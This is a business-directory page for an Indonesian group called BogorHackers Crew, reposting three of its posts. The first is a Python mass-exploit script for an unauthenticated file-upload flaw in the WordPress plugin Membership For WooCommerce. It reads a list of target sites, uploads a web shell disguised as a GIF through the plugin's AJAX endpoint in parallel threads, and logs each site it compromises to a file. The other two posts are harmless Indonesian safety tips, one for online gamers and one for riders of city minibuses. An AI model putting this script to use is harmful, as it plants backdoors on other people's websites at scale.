Home > Indonesia > Bogor > Computer & Electronics Services > BogorHackers Crew

BogorHackers Crew

BogorHackers Crew

Share

25/04/2024

# Exploit Title: Wordpress Plugin - Membership For WooCommerce < v2.1.7 - Arbitrary File Upload to Shell (Unauthenticated)
# Date: 2024-02-25
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import sys , requests, re , json
from multiprocessing.dummy import Pool
from colorama import Fore
from colorama import init
init(autoreset=True)

headers = {'Connection': 'keep-alive', 'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1', 'User-Agent': 'Mozlila/5.0 (Linux;
Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like
Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36', 'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate', 'Accept-Language':
'en-US,en;q=0.9,fr;q=0.8', 'referer': 'www.google.com'}

uploader = """
GIF89a




Resultz

Uploader

Uploaded






"""
requests.urllib3.disable_warnings()

def Exploit(Domain):
try:
if 'http' in Domain:
Domain = Domain
else:
Domain = 'http://'+Domain
myup = {'': ('db.php', uploader)}
req = requests.post(Domain +
'/wp-admin/admin-ajax.php?action=wps_membership_csv_file_upload',
files=myup, headers=headers,verify=False, timeout=10).text
req1 = requests.get(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php')
if 'Ex3ptionaL' in req1:
print (fg+'[+] '+ Domain + ' --> Shell Uploaded')
open('Shellz.txt', 'a').write(Domain +
'/wp-content/uploads/mfw-activity-logger/csv-uploads/db.php' + '\n')
else:
print (fr+'[+] '+ Domain + '{}{} --> Not Vulnerability')
except:
print(fr+' -| ' + Domain + ' --> {} [Failed]')

target = open(input(fm+"Site List: "), "r").read().splitlines()
mp = Pool(int(input(fm+"Threads: ")))
mp.map(Exploit, target)
mp.close()
mp.join()

30/01/2012

*.5 KIAT AMAN UNTUK PARA GAMERS.*

Berikut 5 kiat aman untuk ngegame di dunia maya yang
diramu BogorHacker Crew.

1. Gunakan selalu
antivirus yang terupdate secara berkala dan solusi keamanan komputer yang memiliki fitur anti spyware dan firewall.
2. Gunakan password untuk account yang berbeda dan buatlah password yang sulit ditebak, serta jangan membuat yang terlalu sederhana.
3. Ketiklah URL atau website game online yang diinginkan langsung di browser atau manfaatkan
bookmark yang ada di browser. Dengan begitu Anda akan terhindar dari unsur ketidaksengajaan mengklik link online game dari search engine yang telah terinfeksi.
4. Lindungi data dengan membuat password pelindung baik di komputer maupun di cloud.
5. Jangan pernah gunakan software hasil crack, karena
bisa jadi itu adalah software jahat atau malicious software.

“Performa tinggi
dan tidak mempengaruhi kualitas game yang dimainkan. Dua hal tersebut menjadi indikator penting dalam memilih software
antivirus,”

kata Marcel ‘k1llsen’ Paul, seorang e-sports gamer yang saat ini menduduki peringkat atas pada top gaming league ESC di Jerman.
“Sebagaimana seorang e-sports
professional, menurut saya setiap gangguan dapat berakibat pada kerugian kita sendiri,”

moga bermafaat.

http://forum.bogor-h.org

30/01/2012

Kejahatan yang saat ini marak dilakukan di dalam angkutan kota menciptakan kekhawatiran tersendiri bagi masyarakat.

Supaya Anda tidak menjadi korbannya, berikut ini tips yang diberikan kami, seperti yang dilansir dari TMC Polda Metro Jaya.

*.Hindari memakai dan memperlihatkan
barang berharga di depan umum,
seperti perhiasan dan handphone.
*.Pakailah baju yang sopan dan tertutup.
*.Selektif dalam memilih angkutan kota(angkot),
pilihlah angkot dengan kaca bening, sopir berseragam,
ada ID Card, dan
ada lampu penerangan di dalamnya.
*.Pastikan
Anda mengetahui
nomor trayek dan tujuannya.
*.Hindari tidur
di dalam angkot, hindari menerima makanan atau minuman dari orang lain yang baru Anda kenal, dan tetap waspada terhadap penumpang lain.
apabila ada
tanda-tanda mencurigakan, lebih baik Anda segera turun di tempat yang aman.
*.Selalu ingat, bila perlu disimpan dalam kotak handphone
atau dicatat nomor-nomor penting yang bisa dihubungi pada saat darurat.
*.Lebih baik ada seorang teman yang mendampingi Anda saat naik angkot,
khususnya pada malam hari.
*.Jika penumpang mendapati kejadian/tindakan kejahatan
(melanggar hukum/melakukan tindak pidana),
segera melaporkan kepada kepolisian terdekat atau menghubungi
TMC Polda Metro Jaya di nomor 0215276001 dan SMS 1717.

moga bermamfaat..

http://forum.bogor-h.org

Claim ownership or report listing
Want your business to be the top-listed Computer & Electronics Service in Bogor?
Click here to claim your Sponsored Listing.

Category

Computer Companies

Website

Address


Bogor
16960